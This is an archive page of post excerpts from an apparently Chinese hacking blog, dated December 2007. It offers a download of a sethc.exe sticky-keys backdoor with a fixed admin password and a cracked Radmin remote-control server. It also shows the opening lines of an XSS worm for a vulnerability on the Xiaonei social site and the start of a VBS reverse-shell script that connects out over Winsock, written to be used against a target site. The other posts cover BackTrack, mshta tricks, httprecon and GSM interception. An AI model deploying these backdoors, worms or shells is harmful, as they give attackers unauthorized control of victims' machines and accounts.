2007年12月 的日志

SHIFT后门功能版

鬼仔注:反正我是不会用,默认密码没办法修改

作者:LiFediy
来源:LiFediy's blog

看见有人搞SHIFT后门,我也用VB画个吧.

模仿原版sethc.exe界面,增加了管理功能.

热键启动'Ctrl+Shift+P,或者单击程序"右下角"启动管理登陆.管理密码xp2k

程序很简单,纯属玩玩.喜欢的就玩玩吧,木有2k3的服务器,请自行测试!

欢迎光临My'blog http://www.xp2k.cn/blog/

下载地址:http://www.xp2k.cn/blog/?action=show&id=159

Tags:

Radmin3.1服务端破解免安装精简版

鬼仔注:以前发过 Radmin 3.0 Remote Control 英文破解版 。这次发个3.1的
没赢政天下论坛的帐号的话,附件是下载不了的,所以我放到了网盘上了。
下载: 下载地址1  下载地址2
提前说明下,RADMIN的服务器端和DLL什么的现在会被查杀,不要说我绑马什么的,不懂的不要下。
有帐号的这里下载:http:/ 阅读全文 »

Tags:

BackTrack 3 Beta

鬼仔注:原帖的标题是“无线网络破解至尊工具:bt3最新版本发布了”。同时为了使大家明白BackTrack是什么,我从下面的回帖中找出了几个比较有用的,含有简单的使用方法。

来源:赢政天下论坛
作者:secowu

无线破解爱好者的福音。。。。。

bt3 beta 更新内容:
1.除了700M的光盘iso版本,这次还放出了946M的USB版本.
2.雙核問題也解決了,用了更新的linux内核:2.6.15.5
3.支持的無綫網卡更多,包插入補丁也更完善.
4.xorg的配置腳本增強了
5.漏洞程序和metasploit漏洞升級了
6.PXE網絡啓動方式增加(USB版才有)
7.PwnSauce的John The Ripper集群破解方式增加 (USB版才有)
8.ATI/Intel驅動和Nvidia驅動完善 (USB版才有)
阅读全文 »

Tags:

非常规运行vbs

作者:lcx

  这期专栏依旧是vbs,估计大家会有点烦,那我们来点有意思的吧。vbs有一个对像是“SAPI.SpVoice”,可以用它来讲英语的,这个组件在 xp、2003上默认都可以用的,调用后可以听到电脑上一个国外老男人在说话。好比这样一句代码:●CreateObject ("SAPI.SpVoice").Speak "I LOVE YOU"●,保存成vbs后缀后双击就会听到英语的我爱你了。但随之而来我们讲到另一个问题,不保存成vbs或vbe后缀如何运行vbs代码。

一、用mshta来运行vbs
hta这种类型的文件运行后也是系统权限,其调用宿主就是mshta.exe。我们在cmd下运行这样一行代码:●mshta vbscript:createobject("sapi.spvoice").speak("I 阅读全文 »

Tags:

最新校内xss漏洞加利用worm

from:恶魔傻蛋网络研究中心
呵呵….发现留这个东西实在没什么用处,就在这个群里首发吧.~~呵呵.希望能有对我们ncu的网络安全事业有点促进作用~~呵呵.

大家别去干坏事哦~~~

呵呵,自我感觉这个worm写的还不错.嘿嘿.~

大家学习参考之用,危害极大,如有人用于非法用途,概不负责.

存在漏洞页面:特别好友的描述那里,没有做任何过滤~

=============================================================

以下是worm代码

=============================================================
var url = ""; //本段代码的地址如:http://www.emodd.com/other/1.txt
阅读全文 »

Tags: , ,

httprecon

来源:ZwelL's Blog

一直以来,Web服务器识别都是使用httprint来进行扫描,现在多了一个选择了,而且还是开源的,先试试。
Visit : http://www.computec.ch/projekte/httprecon/

The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important 阅读全文 »

手机信号劫持

来源:ZwelL's Blog

有意思的文章,这个概念很早就被提出,不过很少有人描述这么细的。而且对能够实施的“攻击者”要求也挻高。GSM中的单向认证问题在3G(WCDMA)网络中将被覆盖掉,因为认证不再是3元组,而是5元组。

Origin: http://www.zxboy.com/article.asp?id=158

写点很多人都感兴趣的东西.关于GSM通信网络监听的问题,在那一年广州黑市上出现相关设备就闹得沸沸扬扬.一时大众惶恐自危.有些所谓的资深专家就跳出来说"是不可能的,GSM网络是安全的".这可能是移动通信公司最大的危机.虽然那些专家说的话,我们可一笑置之.但也确实不见很简单的事,不是随便就可以实现的.
记得几年前某次我正在说一个CASE的执行方案,说到关于监听SSL通信的相关数据.有个新来的程序员很白目,大声的提醒我 阅读全文 »

Tags:

TCP版backshell的VBS脚本

'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by 009, [email protected]
'date:071221

Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234

Sub WSEvent_Connect()
wscript.echo "Connected!"
end sub
阅读全文 »

Tags: ,